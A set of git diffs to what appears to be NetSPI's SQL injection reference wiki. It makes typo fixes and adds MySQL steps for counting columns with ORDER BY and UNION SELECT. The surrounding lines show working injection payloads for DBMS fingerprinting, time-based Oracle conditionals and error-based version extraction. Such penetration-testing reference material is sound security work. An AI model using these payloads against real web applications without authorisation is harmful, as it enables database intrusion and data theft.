NetSPI · JacobReynolds · Nov 15, 2022 · Oct 18, 2019 · Oct 18, 2019 · May 28, 2020
diff --git a/_data/injectionDescriptions.yml b/_data/injectionDescriptions.yml
@@ -1,7 +1,7 @@
 injectionDetection: Injections can be detected in a number of ways. The simplest being adding a <code>'</code> or <code>"</code> after various parameters and getting a database error returned from the web server. The sections below describe where to find and how to detect these parameters.
 dbmsIdentification: Detecting what Database Management System (DBMS) is being used is critical in being able to further exploit an injection. Without that knowledge it would not be possible to determine what tables to query, what functions are built-in, and what detections to avoid. A successful response from the below queries identify that the selected DBMS is being used.
 errorBased: Error based injections are exploited through triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results, or gain information on how to restructure the query for further exploitation.
-unionBased: Union based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The Union operator can only be used if the original/new queries have the same structure (number and data type of columns).
+unionBased: Union based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The Union operator can only be used if the original/new queries have the same structure (number and data type of columns). You can try to enumerate the amount of columns using error based enumeration (see error based injection).
 blindBased: Blind SQL injection is one of the more advanced methods of injection. The Partial-Blind and Full-Blind methods are detailed below. Use care when performing these queries, as they can overload a server if performed through heavy automation.
 conditionalStatements: Conditional statements are beneficial for creating complex queries and aiding in Blind Injection.
 injectionPlacement: SQL injection is always a hassle when it isn't apparent where the injection is taking place. It is helpful to have a few ways to exploit injections in various parts of the query.

diff --git a/dbmsIdentification/mysql.html b/dbmsIdentification/mysql.html
@@ -22,7 +22,7 @@ <h3 id="sql-injection-detection">DBMS Identification</h3>
  <td>page.php?id=' 'mysql' -- </td>
  </tr>
  <tr>
- <td>Error messages<br/><i>Note: Triggering DB errors through invalid syntax will sometimes return verbose errors messages that include the DBMS name.</i></td>
+ <td>Error messages<br/><i>Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name.</i></td>
  <td>page.php?id='</td>
  </tr>
  </tbody>

diff --git a/dbmsIdentification/oracle.html b/dbmsIdentification/oracle.html
@@ -19,7 +19,7 @@ <h3 id="sql-injection-detection">DBMS Identification</h3>
  <td>page.jsp?id='UNION SELECT 1 FROM v$version -- </td>
  </tr>
  <tr>
- <td>Error messages<br/><i>Note: Triggering DB errors through invalid syntax will sometimes return verbose errors messages that include the DBMS name.</i></td>
+ <td>Error messages<br/><i>Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name.</i></td>
  <td>page.jsp?id='</td>
  </tr>
  </tbody>

diff --git a/dbmsIdentification/sqlserver.html b/dbmsIdentification/sqlserver.html
@@ -19,7 +19,7 @@ <h3 id="sql-injection-detection">DBMS Identification</h3>
  <td>page.asp?id=sql'; SELECT @@SERVERNAME -- </td>
  </tr>
  <tr>
- <td>Error messages<br/><i>Note: Triggering DB errors through invalid syntax will sometimes return verbose errors messages that include the DBMS name.</i></td>
+ <td>Error messages<br/><i>Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name.</i></td>
  <td>page.asp?id='</td>
  </tr>
  <tr>

diff --git a/injectionTechniques/obfuscation/oracle.html b/injectionTechniques/obfuscation/oracle.html
@@ -55,7 +55,7 @@ <h3 id="obfuscating-queries">Obfuscating Queries</h3>
  <td>SELECT 1 FROM dual -- comment</td>
  </tr>
  <tr>
- <td>If statement</td>
+ <td>If Statement</td>
  <td>BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF;</td>
  </tr>
  <tr>

diff --git a/injectionTypes/errorBased/mysql.html b/injectionTypes/errorBased/mysql.html
@@ -11,6 +11,24 @@ <h3>Error Based</h3>
  </tr>
  </thead>
  <tbody>
+ <tr>
+ <td>Amount of columns using ORDER BY</td>
+ <td>ORDER BY 1
+ <br>
+ <em>Add this at the end of your query</em>
+ <em>If you get no error you know ordering is working</em>
+ <em>Increment the number from 1 until you get an error. Then you know the amount of columns for this table</em>
+ </td>
+ </tr>
+ <tr>
+ <td>Amount of columns using UNION SELECT</td>
+ <td>UNION SELECT 1,2
+ <br>
+ <em>Add this at the end of your query</em>
+ <em>Add increment until you see a valid response, e.g. UNION SELECT 1,2,3</em>
+ <em>If you get no error you know union select is working. You can try to find the values on the page to see where the output goes.</em>
+ </td>
+ </tr>
  <tr>
  <td>XML Parse Error</td>
  <td>SELECT extractvalue(rand(),concat(0x3a,(select version())))</td>